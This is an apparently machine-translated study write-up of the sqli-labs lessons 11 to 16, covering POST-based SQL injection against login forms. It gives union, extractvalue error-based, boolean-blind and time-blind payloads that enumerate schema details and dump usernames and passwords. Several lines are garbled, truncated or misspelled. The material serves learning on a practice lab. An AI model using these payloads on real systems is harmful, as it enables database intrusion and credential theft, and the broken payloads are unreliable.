Less11 based single quote character type injection POST
1. Based on post-type injection
submitted parameters Less11 POST type manner is submitted to the background data to be processed. POST submission safer, because the show will not be saved in the browser history parameters is not URL.
post implantation parameter passing through the input block, it can be brought into a database query.
2. Analyzing the injection point
here are two parameters by entering the username and password, and the execution parameters into the database.
usernaem input box 'password database random error, the error position in the input password 123 described' single quotes single quotes username is closed, if the content with the # annotation behind the back, if the database is not being given, then there is injected username point.
Input username box '# password database is not freely given page displayed properly, determining the presence of the injection point username
3.union injection joint inquiry
(1) order by the number of columns of explosive
' Order # database. 3 given by the third column does not exist ' Order by 2 # database is not given, the normal page, so it is two
(2) determining a display position column
' Union SELECT 1,2 # can be determined by the echo username for the location pages 1, password for the 2 position.
(3) to query the database name
' Union SELECT Database (), Version () # 1 in the position database name, position 2 version of the database information.
(4) a lookup table name
' union select 1,group_concat(table_name) from inforamtion_schema.tables where table_schema=database()#
(5) query column name in the users table
' union select 1,group_concat(colunm_name) from information_schema.columns where table_name='users'#
Content (6) query column
' union select 1,group_concat(username,0x7e,password) from users#
Less12 injection based on the deformation character POST
1. The injection point is determined
by entering the username box backslash \ make the database being given. According to a database error hints can be found in the value placed on him username ( "username"), the double quotation marks and brackets so the need to achieve closure injection ")
entered usrename box") password at will. Database error, error page
enter username box ") # password username random page correctly determined from the injection
2.union joint inquiry injection
fluid and above less11 have been, but in the payload at the 'replace') to complete the injection.
Less13 based POST error injection
1. Analyzing the injection point
or by backslash \ make the database being given. The error judgment, username, and password on ( ''), it is necessary ') closed
2.extractvalue () error injection
(1) order by determining the number of columns 2
' Order # 2 is not being given by
(2) When using the union select when the # 1 query, the page displays only log on successfully without displaying the login information, formulas can not be injected by significantly wrong. Therefore, consideration being given by injection of formula
(3) formula given name database query, payload attached below
') and extractvalue(1,concat(0x7e,database(),0x7e))#
Query table name
') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))#
Users query column name
') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e))#
Query username
') and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))#
Queries password
') and extractvalue(1,concat(0x7e,(select password from users limit 0,1),0x7e))# 完成注入
Less14 based POST error injection
Less13 injection method and the same, by a backslash \ the database can be given, that the parameters in double quotes, "", a extractValue () to complete the injection.
Less15 based on Boolean blind POST
1. determine the type of injected
matter what database inputs are not being given. Can not be significantly wrong way to inject error, consider the blinds.
When the box for username 'union select 1,2 # password random found when a successful login,
can 1. parameter in single quotation marks, 2. successful login data statement is correct, failed login error. It is a typical Boolean blinds.
2.left () Boolean Blind: Input username in the payload, because it is behind the content # Note random password
(1) determines the length of the database
-1 'and length (Database ()) = #. 8
(2) to guess database name
admin 'and left (database (),
If the database name first letter is s, then the login is successful or failed login
admin' and left (database ()
character speculation that the database name can be Secruity
(3) speculation that table names, column names, contents are the same, the blinds too much trouble. Attach part payload
表名 admin' and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e'# 列名 admin' and left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i'# 字段内容 admin' and left((select username from users limit 0,1),1)='D'#
(4) You can also use the brute force burpsuit . Referring use
Less8 Boolean blind
Less16 based on a time-blind POST
1. Boolean blinds
Less15 injection method and the same, but the parameters in of 16 ( ""), it is necessary ") is closed. The only 'modify the payload to complete the injection
2. Time blinds
enter the username ") union select 1,2 and sleep (page found significant delay in response, it can be done with a blind sleep () by.
Attach payload portion
库名 admin") and if(left(database(),1)='s',sleep(2),0)# 表名 admin") and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(2),0)# 列名 admin") and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(2),0)# username admin") and if(left((select username from users limit 0,1),1)='D',sleep(2),0)# password admin") and if(left((select password from users limit 0,1),1)='D',sleep(2),0)#
PS White summary
(1) POST, GET implantation method are basically the same, the main difference lies in the different methods of transmission parameters.
(2) POST parameters are input by our model is that we can control, and to perform database substituting
(3) The content of the page, echo information, error information to determine a method of injection. Backslash \ error method is very easy to use.
White inject learning record! !